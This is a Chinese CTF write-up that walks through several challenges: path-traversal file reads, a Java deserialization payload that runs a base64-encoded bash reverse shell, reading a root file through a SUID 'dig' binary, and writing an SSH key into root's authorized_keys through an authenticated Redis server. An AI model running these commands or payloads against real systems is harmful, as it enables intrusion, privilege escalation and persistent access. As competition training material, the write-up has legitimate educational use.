以NotEnoughEffort的名义打的，只打了14名，喜提优秀奖

Web

express fs

原题 https://cloud.tencent.com/developer/article/2123023

http://8.130.95.87:12180/?
file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=/server/f1%2561g.txt

综合5

有一个readfile功能，读cmdline发现一个/app/demo.jar，读出来，里面有flag不过混淆过了，解一下即可(现在的比赛感觉经常出任意文件读取，分享一下我的fuzz字典：https://fushuling.com/fuzz.txt)

import base64


def decrypt(encrypted_text, key):
    decoded_bytes = base64.b64decode(encrypted_text)
    decrypted_text = []

    for i in range(len(decoded_bytes)):
        encrypted_char = decoded_bytes[i]
        key_char = key[i % len(key)]
        decrypted_char = chr(encrypted_char ^ ord(key_char))
        decrypted_text.append(decrypted_char)

    return ''.join(decrypted_text)


# 使用示例
encrypted_text = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA=="  # 用加密函数得到的加密后的文本
key = "6925cc02789c1d2552b71acc4a2d48fd"  # 用于加密的密钥，应与加密时使用的密钥相同

decrypted_text = decrypt(encrypted_text, key)
print(decrypted_text)

综合6

利用demo.jar里的ping进行rce

package com.example.demo;

import com.sun.org.apache.xml.internal.security.utils.Base64;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

public class Main {
    public static void main(String[] args) throws IOException {
        Ping ping = new Ping();
        ping.setCommand("/bin/bash");
        ping.setArg1("-c");
        ping.setArg2("{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgveHh4IDA+JjE=}|{base64,-d}|{bash,-i}");

        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        new ObjectOutputStream(bao).writeObject(ping);
        System.out.println(Base64.encode(bao.toByteArray()).replaceAll("\n",""));
    }

}

上去之后没找到flag，可能需要提权，suid找到dig命令，读一下flag

find / -user root -perm -4000 -print 2> result.txt
dig -f /root/flag2

这里分享一个看suid命令的网站：https://gtfobins.github.io/ 一搜就有用法

综合7

这个题弹shell上去之后发现啥命令都没有，想传文件建代理都没法，试了挺多方法都没成功，比如自定义函数啥的，最后发现第一题就有个上传文件功能，只是限制了10mb之内，太难绷了，后面开个文章总结一下后渗透怎么传文件

读文件的时候发现了内网的redis密码，一眼写公钥

/readfile?filename=../../../../../../../usr/local/share/application.properties

server.port=18080
server.servlet.context-path=/
management.endpoints.web.exposure.include=heapdump
spring.redis.host=172.25.0.10
spring.redis.port=62341
spring.redis.password=de17cb1cfa1a8e8011f027b416775c6a
spring.servlet.multipart.max-file-size=10MB

ssh-keygen -t rsa
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") >spaced_key.txt
cat spaced_key.txt |proxychains redis-cli -h 172.25.0.10 -p 62341 -a de17cb1cfa1a8e8011f027b416775c6a -x set ssh_key
proxychains redis-cli -h 172.25.0.10 -p 62341 -a de17cb1cfa1a8e8011f027b416775c6a -x set ssh_key
config set dir /root/.ssh
config get dir
config set dbfilename authorized_keys
save

proxychains ssh -i ~/.ssh/id_rsa root@172.25.0.10

MISC

除了签到我记得基本上都是零解，上三道安卓逆向到misc可还行

签到

空格数量当作ascii码即可

def count_spaces_per_line(file_path):
    flag=""
    with open(file_path, 'r') as file:
        lines = file.readlines()
        for line_num, line in enumerate(lines, start=1):
            space_count = line.count(' ')
            flag=flag+chr(int(space_count))
            print(f"第{line_num}行空格数量：{space_count}")
    print(flag)

file_path = 'qd.txt' 
count_spaces_per_line(file_path)